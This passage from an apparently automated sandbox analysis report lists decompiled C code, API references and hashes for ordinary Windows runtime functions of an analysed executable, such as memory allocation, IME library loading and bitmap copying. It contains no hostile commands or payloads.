				return _t10 - 2;
			}

0x00408a64
0x00408a68
0x00408a70
0x00408a78
0x00408a8d
0x00408a97

APIs

CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,00408AA7,?,?,00408FF9), ref: 00408A8D

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: 53a0173ed05a72329b1b182ff534bc40242ccda0b0fea2d38906e04b8ae2a7da
Instruction ID: bc28afda78b28a899c61c698d00745da579acbd4b87cddba358b3620f9a13c5f
Opcode Fuzzy Hash: 53a0173ed05a72329b1b182ff534bc40242ccda0b0fea2d38906e04b8ae2a7da
Instruction Fuzzy Hash: 55D09ED23A17112AD25076FE0C82F5A008C8B9A61AB06487AB30DF72C2D9AD8D05026D

Uniqueness

Uniqueness Score: -1.00%

Function 00426074, Relevance: 1.3, APIs: 1, Instructions: 70
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00426074(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				intOrPtr _t27;
				void* _t29;
				intOrPtr* _t48;
				void _t52;

				_t48 =  &_v16;
				if( *0x4bc888 == 0) {
					_t29 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_v12 = _t29;
					_t52 =  *0x4bc884; // 0x3a0000
					 *_v12 = _t52;
					E00402D04(0x4a05d4, 2, _v12 + 4);
					 *((intOrPtr*)(_v12 + 6)) = E0042606C(_v12 + 5, E0042604C);
					 *_t48 = _v12 + 0xa;
					do {
						 *((char*)( *_t48)) = 0xe8;
						 *((intOrPtr*)( *_t48 + 1)) = E0042606C( *_t48, _v12 + 4);
						 *((intOrPtr*)( *_t48 + 5)) =  *0x4bc888;
						 *0x4bc888 =  *_t48;
						 *_t48 =  *_t48 + 0xd;
					} while ( *_t48 - _v12 < 0xffc);
					 *0x4bc884 = _v12;
				}
				_v8 =  *0x4bc888;
				 *_t48 =  *0x4bc888;
				 *0x4bc888 =  *((intOrPtr*)( *_t48 + 5));
				_t27 =  *_t48;
				 *((intOrPtr*)(_t27 + 5)) = _a4;
				 *((intOrPtr*)(_t27 + 9)) = _a8;
				return _v8;
			}

0x0042607c
0x00426087
0x0042609b
0x004260a0
0x004260a6
0x004260ac
0x004260be
0x004260d6
0x004260df
0x004260e1
0x004260e3
0x004260f5
0x004260fc
0x00426101
0x00426103
0x0042610b
0x00426115
0x00426115
0x0042611c
0x00426121
0x00426128
0x0042612a
0x0042612f
0x00426135
0x00426140

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0042609B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 56dfab6c750fd57e46d69d2ab6e01a6fe5c0c227b2529122c7062c8c1ecf4a2f
Instruction ID: c5320d0a2ad2eb67cea62fd777001988c1f43def9419e51c769c5e3a792bff3c
Opcode Fuzzy Hash: 56dfab6c750fd57e46d69d2ab6e01a6fe5c0c227b2529122c7062c8c1ecf4a2f
Instruction Fuzzy Hash: 0B31D374A00219DFCB10DF98D4C1F89BBF0EF49314F1582AAE688EB3A5D375A941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004018F8, Relevance: 1.3, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004018F8(void* __eax, void** __ecx, intOrPtr __edx) {
				intOrPtr _t20;
				int _t35;
				signed int* _t38;
				intOrPtr* _t44;
				void** _t45;
				intOrPtr* _t49;

				 *_t49 = __edx;
				_t45 = _t49 + 8;
				_t44 = _t49 + 4;
				_t38 = _t49 + 0xc;
				 *(_t49 + 0x10) = __eax + 0x00000fff & 0xfffff000;
				 *(_t49 + 0x14) = __eax +  *_t49 & 0xfffff000;
				 *__ecx =  *(_t49 + 0x10);
				__ecx[1] =  *(_t49 + 0x14) -  *(_t49 + 0x10);
				_t20 =  *0x4bc5ec; // 0x2641b4
				 *_t44 = _t20;
				while(0x4bc5ec !=  *_t44) {
					_t10 =  *_t44 + 8; // 0x0
					 *_t45 =  *_t10;
					 *_t38 =  *((intOrPtr*)( *_t44 + 0xc)) +  *_t45;
					if( *_t45 <  *(_t49 + 0x10)) {
						 *_t45 =  *(_t49 + 0x10);
					}
					if( *_t38 >  *(_t49 + 0x14)) {
						 *_t38 =  *(_t49 + 0x14);
					}
					if( *_t45 <  *_t38) {
						_t35 = VirtualFree( *_t45,  *_t38 -  *_t45, 0x4000); // executed
						if(_t35 == 0) {
							 *0x4bc5c8 = 2;
						}
					}
					 *_t44 =  *((intOrPtr*)( *_t44));
				}
				return 0x4bc5ec;
			}

0x004018ff
0x00401902
0x00401906
0x0040190a
0x0040191e
0x0040192b
0x00401933
0x0040193d
0x00401940
0x00401945
0x004019a1
0x0040194b
0x0040194e
0x00401957
0x0040195f
0x00401965
0x00401965
0x0040196d
0x00401973
0x00401973
0x00401979
0x00401988
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199f
0x0040199f
0x004019b1

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 00401988

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4a0dd554ff3172814904fd10d83be2f86fea215b62cf821b40949e3dd13a0c6e
Instruction ID: b5b19fb004b1513b500f8dd7953e53b640de4c8ae482cc9aae1b4219d938cf5a
Opcode Fuzzy Hash: 4a0dd554ff3172814904fd10d83be2f86fea215b62cf821b40949e3dd13a0c6e
Instruction Fuzzy Hash: 0B21DDB5204202DFC750CF28D8C0A5AB7E4FF99314B20496AE998DB364D334E909CB66

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0045200C, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0045200C() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x4bb254; // 0x4bc744
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x452172);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x4bcb30 == 0) {
						 *0x4bcb30 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x4a0e14 == 0) {
						 *0x4a0e14 = LoadLibraryA("imm32.dll");
						if( *0x4a0e14 != 0) {
							_t11 =  *0x4a0e14; // 0x0
							 *0x4bcb34 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x4a0e14; // 0x0
							 *0x4bcb38 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x4a0e14; // 0x0
							 *0x4bcb3c = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x4a0e14; // 0x0
							 *0x4bcb40 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x4a0e14; // 0x0
							 *0x4bcb44 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x4a0e14; // 0x0
							 *0x4bcb48 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x4a0e14; // 0x0
							 *0x4bcb4c = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x4a0e14; // 0x0
							 *0x4bcb50 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x4a0e14; // 0x0
							 *0x4bcb54 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x4a0e14; // 0x0
							 *0x4bcb58 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x452179);
					return SetErrorMode(_v8);
				}
			}

0x0045200d
0x00452011
0x0045201a
0x0045217c
0x00452020
0x0045202a
0x0045202f
0x00452030
0x00452035
0x00452038
0x00452042
0x0045205b
0x0045205b
0x00452067
0x00452077
0x00452083
0x0045208e
0x00452099
0x004520a3
0x004520ae
0x004520b8
0x004520c3
0x004520cd
0x004520d8
0x004520e2
0x004520ed
0x004520f7
0x00452102
0x0045210c
0x00452117
0x00452121
0x0045212c
0x00452136
0x00452141
0x0045214b
0x00452156
0x00452156
0x00452083
0x0045215d
0x00452160
0x00452163
0x00452171
0x00452171

APIs

SetErrorMode.KERNEL32(00008000), ref: 00452025
GetModuleHandleA.KERNEL32(USER32,00000000,00452172,?,00008000), ref: 00452049
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,00452172,?,00008000), ref: 00452056
LoadLibraryA.KERNEL32(imm32.dll), ref: 00452072
GetProcAddress.KERNEL32(00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 00452094
GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520A9
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520BE
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520D3
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520E8
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172), ref: 004520FD
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000), ref: 00452112
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00452127
GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0045213C
GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00452151
SetErrorMode.KERNEL32(?,00452179,00008000), ref: 0045216C

Strings

ImmSetCompositionFontA, xrefs: 00452107
ImmGetContext, xrefs: 00452089
ImmNotifyIME, xrefs: 00452146
USER32, xrefs: 00452044
ImmSetConversionStatus, xrefs: 004520C8
WINNLSEnableIME, xrefs: 00452050
imm32.dll, xrefs: 0045206D
ImmGetCompositionStringA, xrefs: 0045211C
ImmSetOpenStatus, xrefs: 004520DD
ImmSetCompositionWindow, xrefs: 004520F2
ImmIsIME, xrefs: 00452131
ImmReleaseContext, xrefs: 0045209E
ImmGetConversionStatus, xrefs: 004520B3

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 3397921170-3950384806
Opcode ID: 0a7273cfec4f02dc86132beaee21e22f38da2187c8236c01cddb6d993c9dac67
Instruction ID: 9ae67bee77e18cc622bbf1c567346d40709719c033d8274d3456cfc1f0479237
Opcode Fuzzy Hash: 0a7273cfec4f02dc86132beaee21e22f38da2187c8236c01cddb6d993c9dac67
Instruction Fuzzy Hash: CD3150F1605344AFDB00DFA5AE86A1B3BE8E706705B11093BBA01D7292D6FC7814CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0042CA18, Relevance: 48.5, APIs: 32, Instructions: 500
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042CA18(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
				struct HBITMAP__* _v8;
				struct HPALETTE__* _v12;
				struct HPALETTE__* _v16;
				struct HPALETTE__* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				void* _v44;
				intOrPtr _v48;
				struct tagRGBQUAD _v52;
				struct HPALETTE__* _v56;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				struct tagRECT _v156;
				void* __ebx;
				void* __ebp;
				signed short _t229;
				int _t281;
				signed int _t290;
				signed short _t292;
				struct HBRUSH__* _t366;
				struct HPALETTE__* _t422;
				signed int _t441;
				intOrPtr _t442;
				intOrPtr _t444;
				intOrPtr _t445;
				void* _t455;
				void* _t457;
				void* _t459;
				intOrPtr _t460;

				_t423 = __ecx;
				_t457 = _t459;
				_t460 = _t459 + 0xffffff68;
				_push(_t419);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
						E0042C5D4(_v8);
						_v116 = 0;
						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
							E004297B4();
						}
						_v28 = E004298D4(GetDC(0));
						_v32 = E004298D4(CreateCompatibleDC(_v28));
						_push(_t457);
						_push(0x42d066);
						_push( *[fs:edx]);
						 *[fs:edx] = _t460;
						if( *(_a8 + 0x18) >= 0x28) {
							_v40 = E00402AE4(0x42c, _t423, 0);
							_push(_t457);
							_push(0x42cd70);
							_push( *[fs:edx]);
							 *[fs:edx] = _t460;
							 *(_a8 + 0x18) = 0x28;
							 *((short*)(_a8 + 0x24)) = 1;
							if( *(_a8 + 0x26) == 0) {
								_t290 = GetDeviceCaps(_v28, 0xc);
								_t292 = GetDeviceCaps(_v28, 0xe);
								_t419 = _t290 * _t292;
								 *(_a8 + 0x26) = _t290 * _t292;
							}
							memcpy(_v40, _a8 + 0x18, 0xa << 2);
							 *(_a8 + 4) =  *(_a8 + 0x1c);
							_t441 = _a8;
							 *(_t441 + 8) =  *(_a8 + 0x20);
							if( *(_a8 + 0x26) > 8) {
								_t229 =  *(_a8 + 0x26);
								if(_t229 == 0x10) {
									L30:
									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
										E0042C9CC(_a8);
										_t104 =  &(_v40->bmiColors); // 0x29
										_t441 = _t104;
										E00402D04(_a8 + 0x40, 0xc, _t441);
									}
								} else {
									_t441 = _a8;
									if(_t229 == 0x20) {
										goto L30;
									}
								}
							} else {
								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
									if(_v16 == 0) {
										if(_v8 != 0) {
											_v24 = SelectObject(_v32, _v8);
											if(_v116 <= 0 || _v120 == 0) {
												asm("cdq");
												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
											} else {
												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
												_t441 = _a8;
												 *(_t441 + 0x38) = _t281;
											}
											SelectObject(_v32, _v24);
										}
									} else {
										_t76 =  &(_v40->bmiColors); // 0x29
										_t441 = _t76;
										E0042A074(_v16, 0xff, _t441);
									}
								} else {
									_t441 = 0;
									_v40->bmiColors = 0;
									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
								}
							}
							_v20 = E004298D4(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
							if(_v44 == 0) {
								E0042982C(_t419);
							}
							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
								_pop(_t442);
								 *[fs:eax] = _t442;
								_push(0x42cd77);
								return E00402B14(_v40);
							} else {
								asm("cdq");
								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
								E00403E98();
								E00403E98();
								goto L58;
							}
						} else {
							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
								_v20 = E004298D4(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
							} else {
								_v20 = E004298D4(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
							}
							E004298D4(_v20);
							_v24 = E004298D4(SelectObject(_v32, _v20));
							_push(_t457);
							_push(0x42d017);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_push(_t457);
							_push(0x42d006);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_v56 = 0;
							_t422 = 0;
							if(_v16 != 0) {
								_v56 = SelectPalette(_v32, _v16, 0);
								RealizePalette(_v32);
							}
							_push(_t457);
							_push(0x42cfe4);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							if(_a4 == 0) {
								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
							} else {
								_t366 = E00428C98( *((intOrPtr*)(_a4 + 0x14)));
								E0041B1E4(0, _t422,  *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
								FillRect(_v32,  &_v156, _t366);
								SetTextColor(_v32, E00427FD0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
								SetBkColor(_v32, E00427FD0(E00428C5C( *((intOrPtr*)(_a4 + 0x14)))));
								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
									_v52 = E00427FD0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
									_v48 = E00427FD0(E00428C5C( *((intOrPtr*)(_a4 + 0x14))));
									SetDIBColorTable(_v32, 0, 2,  &_v52);
								}
							}
							if(_v8 == 0) {
								_pop(_t444);
								 *[fs:eax] = _t444;
								_push(0x42cfeb);
								if(_v16 != 0) {
									return SelectPalette(_v32, _v56, 0xffffffff);
								}
								return 0;
							} else {
								_v36 = E004298D4(CreateCompatibleDC(_v28));
								_push(_t457);
								_push(0x42cfba);
								_push( *[fs:eax]);
								 *[fs:eax] = _t460;
								_t455 = E004298D4(SelectObject(_v36, _v8));
								if(_v12 != 0) {
									_t422 = SelectPalette(_v36, _v12, 0);
									RealizePalette(_v36);
								}
								if(_a4 != 0) {
									SetTextColor(_v36, E00427FD0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
									SetBkColor(_v36, E00427FD0(E00428C5C( *((intOrPtr*)(_a4 + 0x14)))));
								}
								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
								if(_v12 != 0) {
									SelectPalette(_v36, _t422, 0xffffffff);
								}
								E004298D4(SelectObject(_v36, _t455));
								_pop(_t445);
								 *[fs:eax] = _t445;
								_push(0x42cfc1);
								return DeleteDC(_v36);
							}
						}
					} else {
						goto L58;
					}
				} else {
					L58:
					return _v20;
				}
			}

0x0042ca18
0x0042ca19
0x0042ca1b
0x0042ca21
0x0042ca24
0x0042ca27
0x0042ca2a
0x0042ca2f
0x0042ca39
0x0042ca5c
0x0042ca7b
0x0042ca82
0x0042ca89
0x0042caa2
0x0042caa2
0x0042cab3
0x0042cac4
0x0042cac9
0x0042caca
0x0042cacf
0x0042cad2
0x0042cadc
0x0042cb46
0x0042cb4b
0x0042cb4c
0x0042cb51
0x0042cb54
0x0042cb5a
0x0042cb64
0x0042cb72
0x0042cb7a
0x0042cb87
0x0042cb8c
0x0042cb93
0x0042cb93
0x0042cba7
0x0042cbb2
0x0042cbbb
0x0042cbbe
0x0042cbc9
0x0042cc99
0x0042cca1
0x0042ccac
0x0042ccb3
0x0042ccb8
0x0042ccc0
0x0042ccc0
0x0042ccce
0x0042ccce
0x0042cca3
0x0042cca3
0x0042ccaa
0x00000000
0x00000000
0x0042ccaa
0x0042cbcf
0x0042cbd7
0x0042cc05
0x0042cc23
0x0042cc36
0x0042cc3d
0x0042cc72
0x0042cc82
0x0042cc45
0x0042cc57
0x0042cc5c
0x0042cc5f
0x0042cc5f
0x0042cc8f
0x0042cc8f
0x0042cc07
0x0042cc0a
0x0042cc0a
0x0042cc15
0x0042cc15
0x0042cbe5
0x0042cbe8
0x0042cbea
0x0042cbf6
0x0042cbf6
0x0042cbd7
0x0042ccef
0x0042ccf6
0x0042ccf8
0x0042ccf8
0x0042cd01
0x0042cd5c
0x0042cd5f
0x0042cd62
0x0042cd6f
0x0042cd26
0x0042cd36
0x0042cd46
0x0042cd4b
0x0042cd50
0x00000000
0x0042cd50
0x0042cade
0x0042caf0
0x0042cb34
0x0042caf2
0x0042cb10
0x0042cb10
0x0042cd7a
0x0042cd91
0x0042cd96
0x0042cd97
0x0042cd9c
0x0042cd9f
0x0042cda4
0x0042cda5
0x0042cdaa
0x0042cdad
0x0042cdb2
0x0042cdb5
0x0042cdbb
0x0042cdcc
0x0042cdd3
0x0042cdd3
0x0042cdda
0x0042cddb
0x0042cde0
0x0042cde3
0x0042cdea
0x0042cec0
0x0042cdf0
0x0042cdf6
0x0042ce14
0x0042ce24
0x0042ce3c
0x0042ce56
0x0042ce63
0x0042ce7c
0x0042ce8f
0x0042ce9e
0x0042ce9e
0x0042ce63
0x0042cec9
0x0042cfc3
0x0042cfc6
0x0042cfc9
0x0042cfd2
0x00000000
0x0042cfde
0x0042cfe3
0x0042cecf
0x0042cedd
0x0042cee2
0x0042cee3
0x0042cee8
0x0042ceeb
0x0042cf00
0x0042cf06
0x0042cf17
0x0042cf1d
0x0042cf1d
0x0042cf26
0x0042cf3b
0x0042cf55
0x0042cf55
0x0042cf7d
0x0042cf86
0x0042cf8f
0x0042cf8f
0x0042cf9e
0x0042cfa5
0x0042cfa8
0x0042cfab
0x0042cfb9
0x0042cfb9
0x0042cec9
0x00000000
0x00000000
0x00000000
0x0042d06d
0x0042d06d
0x0042d076
0x0042d076

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 0042CA98
GetDC.USER32(00000000), ref: 0042CAA9
CreateCompatibleDC.GDI32(00000000), ref: 0042CABA
CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0042CB06
CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0042CB2A
SelectObject.GDI32(?,?), ref: 0042CD87
SelectPalette.GDI32(?,00000000,00000000), ref: 0042CDC7
RealizePalette.GDI32(?), ref: 0042CDD3
SetTextColor.GDI32(?,00000000), ref: 0042CE3C
SetBkColor.GDI32(?,00000000), ref: 0042CE56
SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 0042CE9E
FillRect.USER32(?,?,00000000), ref: 0042CE24

Part of subcall function 00427FD0: GetSysColor.USER32 ref: 00427FDA

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 0042CEC0
CreateCompatibleDC.GDI32(00000028), ref: 0042CED3
SelectObject.GDI32(?,00000000), ref: 0042CEF6
SelectPalette.GDI32(?,00000000,00000000), ref: 0042CF12
RealizePalette.GDI32(?), ref: 0042CF1D
SetTextColor.GDI32(?,00000000), ref: 0042CF3B
SetBkColor.GDI32(?,00000000), ref: 0042CF55
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042CF7D
SelectPalette.GDI32(?,00000000,000000FF), ref: 0042CF8F
SelectObject.GDI32(?,00000000), ref: 0042CF99
DeleteDC.GDI32(?), ref: 0042CFB4

Part of subcall function 00428C98: CreateBrushIndirect.GDI32(?), ref: 00428D42

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: 68446657e17cbf7424031cc112ad039a7a9c60e921f431293f22cdcdefd7dad1
Instruction ID: a104fc63766089e9acbe7141db68acdfa28394ef422aaaf72885006a8d84f5f4
Opcode Fuzzy Hash: 68446657e17cbf7424031cc112ad039a7a9c60e921f431293f22cdcdefd7dad1
Instruction Fuzzy Hash: AC12F971A00218AFDB00DFA9D985F9E77B8EF08314F558066F918EB291C778ED40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004635DC, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004635DC(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x463b46);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
